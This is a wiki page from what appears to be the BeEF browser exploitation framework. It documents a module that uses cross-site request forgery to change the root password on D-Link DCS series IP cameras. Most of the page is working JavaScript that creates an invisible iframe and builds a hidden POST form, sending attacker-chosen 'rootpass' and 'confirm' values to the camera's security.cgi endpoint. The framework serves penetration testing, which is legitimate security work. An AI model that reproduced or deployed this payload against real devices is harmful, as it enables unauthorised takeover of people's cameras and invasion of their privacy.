-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Dlink DCS series CSRF
Haoxi Tan edited this page Jan 9, 2020
·
2 revisions
-
Objective: Attempts to change the password on a Dlink DCS series camera.
-
Authors: bcoles
-
Browsers: All
Uses an invisible iframe with POST form to change config
var dlink_dcs_iframe = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', base + "/setup/security.cgi");
form.setAttribute('method', 'post');
var input = null;
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'rootpass');
input.setAttribute('value', passwd);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'confirm');
input.setAttribute('value', passwd);
form.appendChild(input);
dlink_dcs_iframe.contentWindow.document.body.appendChild(form);
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK